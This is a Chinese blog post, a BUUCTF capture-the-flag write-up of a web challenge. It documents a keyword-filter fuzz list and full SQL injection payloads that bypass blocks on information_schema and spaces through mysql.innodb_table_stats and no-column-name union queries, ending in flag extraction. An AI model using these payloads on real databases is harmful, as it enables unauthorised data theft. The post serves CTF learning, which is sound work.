WEB—无列名注入与过滤information_schema

最新推荐文章于 2023-09-19 21:23:41 发布
最新推荐文章于 2023-09-19 21:23:41 发布
阅读量2.6k 收藏 4
点赞数
分类专栏: SQL注入 渗透测试 BUUCTF 文章标签: sql union 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58784379/article/details/121228828
版权
渗透测试 同时被 3 个专栏收录
82 篇文章 17 订阅
订阅专栏
BUUCTF
30 篇文章 0 订阅
订阅专栏
SQL注入
13 篇文章 0 订阅
订阅专栏

一开始由于注册admin的时候,告知用户已被注册,以为需要爆破admin密码,失败后尝试万能密码,发现也不行。。。注册新用户后又对广告的xss研究半天,虽然怀疑过SQL,后来没想到真的是SQL注入

知识点

  • 无列名注入

  • 过滤information_schema

随便注册一个账户登录,进去后可以发布广告【千万不要写入一个xss,弹来弹去,盲猜你们会尝试】

发布一个广告名为:1',内容随意 

点击广告详情,弹出关键报错信息,数据库为MariaDB

继续注入,发布一个广告名为: 1' and 1=1

提示含有敏感信息,fuzz测试一下

`
~
!
@
#
$
%
^
&
*
(
)
-
_
=
+
[
]
{
}
|
\
;
:
'
"
,
.
<
>
/
?
 
--
--+
/**/
&&
||
<>
!(<>)
and
or
xor
if
not
select
sleep
union
from
where
order
by
concat
group
benchmark
length
in
is
as
like
rlike
limit
offset
distinct
perpare
declare
database
schema
information
table
column
mid
left
right
substr
handler
ascii
set
char
hex
updatexml
extractvalue
regexp
floor
having
between
into
join
file
outfile
load_file
create
drop
convert
cast
show
user
pg_sleep
reverse
execute
open
read
first
case
end
then
iconv
greatest 

这里fuzz测试由于广告数有上限,所以得分批排查,or、order by、information_schema、空格等都被过滤 

无列名注入:

由于information_schema被过滤,但是在Maria数据库下的这个表可以查表名:mysql.innodb_table_stats

构造查询回显字段位的payload(空格用/**/代替):

1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22' 

查询数据库

1'/**/union/**/select/**/1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22' 

查询表

1'/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name=database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22' 

那么现在已经查询到了两个表,如何查询里面的内容呢?

举个例子

首先创建一个名为buuctf的表,再创一个web的表

插入几条数据

mysql> insert into web values(1,'hello','python'),(2,'hello','java'),(3,'hello','ruby');

一、正常的查询如下:

二、那么如果再加一个union呢?这里看到我们的列名被1,2,3代替了。这也就是说,我们可以使用数字来代替列,如3代替了address 

三、利用数字3代替未知的列名,注意这里需要在3前后加上反引号,而末尾的a为必须添加的别名(写啥都行,只是别名) 

四、当 ` 不能使用时,用别名来代替

构造查询表字段的payload:

1'/**/union/**/select/**/1,(select/**/group_concat(b)/**/from/**/(select/**/1,2/**/as/**/b,3/**/union/**/select/**/*/**/from/**/users)a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

如果说第二个字段为flag,admin和sganyu的话,那么第三个字段即为内容了,如下图

select group_concat(b) from (select 1,2 as b,3 union select * from web)a; 

select group_concat(b) from (select 1,2,3 as b union select * from web)a; 

构造查询flag的payload:

1'/**/union/**/select/**/1,(select/**/group_concat(b)/**/from/**/(select/**/1,2,/**/3/**/as/**/b/**/union/**/select/**/*/**/from/**/web1.users)a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22' 

 

bbb07
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
解析MySQLinformation_schema数据库
09-10
本篇文章是对MySQLinformation_schema数据库进行了详细的分析介绍,需要的朋友参考下
CTFsql注入之无列名注入的姿势
qq_71467825的博客
11-27 152
顾名思义,就是在不知道列名的情况下进行 sql 注入。在 mysql => 5 的版本中存在一个名为 information_schema 的库,里面记录着 mysql 中所有表的结构。通常,在 mysql sqli 中,我们会通过此库中的表去获取其他表的结构,也就是表名、列名等。但是这个库经常被 WAF 过滤。当我们通过暴力破解获取到表名后,如何利用呢?
ctfweb-sql列名注入
qq_51862722的博客
07-12 462
ctfweb-sql列名注入 我的blog,欢迎来玩 谈谈sql注入列名的情况 以及该如何解题 无列名注入 顾名思义,就是在不知道列名的情况下进行 sql 注入。 在大多数 CTF 题目中,information_schema 库被过滤,称为无列名注入。 方法总结 基于union select的无列名注入 不适用表名查询 一般sql查询: select * from admin 假设得到列名 id,name,password,则使用联合查询union: select 1,2,3 union se.
information_schema过滤与无列名注入
snowlyzz的博客
09-06 1218
information_schema过滤与无列名注入
Bypass information_schema
mi900709的博客
12-02 625
Bypass information_schema 前言 聊一聊mysql在被waf禁掉了information_schema库后还能有哪些利用思路,这个想法是前一段时间想到的,这次趁着安全客活动就在这里记录一下吧~ 实验环境 windows 2008 r2 phpstudy (mysql 5.7) 某waf(原因是该waf可以设置非法访问information_schema数据库) 前置任务 进行bypass之前先了解一下mysql中的information_schma这个库是干嘛的,在SQ
mysql注入绕过information_schema过滤
b1ackc4t的博客
10-19 5635
1.利用mysql5.7新增的sys.schema_auto_increment_columns 这是sys数据库下的一个视图,基础数据来自与information_schema,他的作用是对表的自增ID进行监控,也就是说,如果某张表存在自增ID,就可以通过该视图来获取其表名和所在数据库名 以下为该视图的所有列 2.sys.schema_table_statistics_with_buffer 这是sys数据库下的视图,里面存储着所有数据库所有表的统计信息 ...
聊一聊bypass information_schema
zhangge3663的博客
05-10 251
前言 聊一聊mysql在被waf禁掉了information_schema库后还能有哪些利用思路,这个想法是前一段时间想到的,这次趁着安全客活动就在这里记录一下吧~ # 实验环境 windows 2008 r2 phpstudy (mysql 5.7) 某waf(原因是该waf可以设置非法访问information_schema数据库) 前置任务 进行bypass之前先了解一下mysql中的information_schma这个库是干嘛的,在SQL注入中它的作用是什么,那么有没有可以替代这个库
mysql 注入 information_schema_绕过IDS过滤information_schema继续注入
weixin_35867608的博客
02-07 1147
原文:绕过IDS过滤information_schema继续注入//利用MySQL出错爆出字段mysql> SELECT * FROM (SELECT * FROM user A JOIN user B) C;ERROR 1060 (42S21): Duplicate column name 'Host'mysql> SELECT * FROM (SELECT * FROM user ...
information_schema数据库在SQL注入中的应用.docx
06-11
本文介绍了information_schema数据库的三张重要的表"schemata"、“tables”和“columns”在SQL注入中的应用思路。
探讨SQL利用INFORMATION_SCHEMA系统视图如何获取表的主外键信息
09-10
本篇文章是对SQL利用INFORMATION_SCHEMA系统视图如何获取表的主外键信息进行了详细的分析介绍,需要的朋友参考下
关于MySQL绕过授予information_schema中对象时报ERROR 1044(4200)错误
12-14
这个问题是微信群中网友关于MySQL权限的讨论,有这么一个业务需求(下面是他的原话): 因为MySQL的很多功能都依赖主键,我想用zabbix用户,来监控业务数据库的所有表,是否都建立了主键。 监控的语句是: FROM information_schema.tables t1 LEFT OUTER JOIN information_schema.table_constraints t2 ON t1.table_schema = t2.table_schema AND t1.table_name = t2.table_name
MySQL8.0-INFORMATION_SCHEMA增强
01-21
Coinciding with the new native data dictionary in MySQL 8.0, we have made a number of useful enhancements to our INFORMATION_SCHEMA subsystem design in MySQL 8.0. In this post I will first go th
Web安全之SQL注入
qq_42751192的博客
06-09 1793
SQL注入SQL lnjection)是发生在 Web 程序中数据库层的安全漏洞,是比较常用的网络攻击方式之一,他不是利用操作系统的 BUG 来实现攻击,而是针对程序员编写时的疏忽,通过 SQL 语句,实现无账号登录,甚至修改数据库。也就是说,SQL 注入就是在用户输入的字符串中添加 SQL 语句,如果在设计不良的程序中忽略了检查,那么这些注入进去的 SQL 语句就会被数据库服务器误认为是正常的 SQL 语句而运行,攻击者就可以执行计划外的命令或者访问未授权的数据。
BUUCTF:[GYCTF2020]Ezsqli --过滤information_schem ------ 无列明注入过滤union 使用ascii偏移来做
Zero_Adam的博客
03-15 1318
一、自己做: 直截了当的sql注入,先用fuzz字典跑一下: information_schema.table等被过滤了, 而且union 也被过了, 尝试了 || 和&& 等没有过滤,并且strsub,limit等都没有过滤,初步判断盲注应该时可以的。 但是 information_chema等被过滤了,表和 列都查不出来, 二、学到的&&不足: 当information_schema等被过滤的时候,能够查出数据库的名字,但是表明不知道,这时可以用这个来sys.schem
[GYCTF2020]Ezsqli
fmyyy1的博客
04-05 1251
查询界面,猜测sql注入,查询抓包 fuzz后发现information_schema,or,union等关键字被过滤了,应该是要无列名注入。 用^代替or id=0^(length(database())>1) 证明存在sql注入 InnoDb引擎 从MYSQL5.5.8开始,InnoDB成为其默认存储引擎。而在MYSQL5.6以上的版本中,inndb增加了innodb_index_stats和innodb_table_stats两张表,这两张表中都存储了数据库和其数据表的信息,但是没有存储列.
SQL注入之无列名注入
weixin_46330722的博客
11-10 4019
列名注入概念原理利用 概念 在我们进行sql注入的时候,有时候information_schema这个库可能会因为过滤而无法调用,这是我们就不能通过这个库来查出表名和列名。这时我们可以通过两种方法来查出表名: InnoDb引擎 从MYSQL5.5.8开始,InnoDB成为其默认存储引擎。而在MYSQL5.6以上的版本中,inndb增加了innodb_index_stats和innodb_table_stats两张表,这两张表中都存储了数据库和其数据表的信息,但是没有存储列名。 sys数据库 在5.7以上
ctfshow web 14 sql注入
m0_46412682的博客
07-16 405
ctfshow web 14 sql注入 开始的页面是一段代码: 这是get传参,/?c=1 sleep一秒后输出$url /?c=2也会输出@A@,有5555 4444 333但是不可能等这么久,直接输 /?c=3,出现 @A@here_1s_your_f1ag.php@A@ 那打开这个文件,这是一个查询的页面 输入1回显是admin,url中可能存在sql注入 按F12查看源代码过滤了/information_schema.tables|information_schema.colum
[SWPU2019]Web1 sql注入过滤information列名查询
m0_64180167的博客
09-19 363
记录一道过滤 or 导致无法使用 information_schema.tables的题目。
sql注入information_schema代替,无列名注入之[SWPU2019]Web11
qq_58970968的博客
08-10 849
的时候,有时候information_schema这个库可能会因为过滤而无法调用,这时我们就不能通过这个库来查出表名和列名。但是上述两种方法都只能查出表名,无法查到列名,这时我们就要用到无列名注入了。无列名注入,顾名思义,就是不需要列名就能注出数据的注入。但是mysql.innodb_table_stats只查到表名,所以不知道列名information_schema可以查到所有的数据库和表名和列名;当or 被过滤时不能使用information_schema;这道题过滤了空格,用/**/绕过;...
information_schema | | mysql | | performance_schema
最新发布
01-10
information_schema是MySQL数据库中的一个系统数据库,它包含了关于数据库、表、列、索引、用户权限等信息的元数据。mysql和performance_schemainformation_schema中的两个表。 mysql表包含了MySQL服务器的用户...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值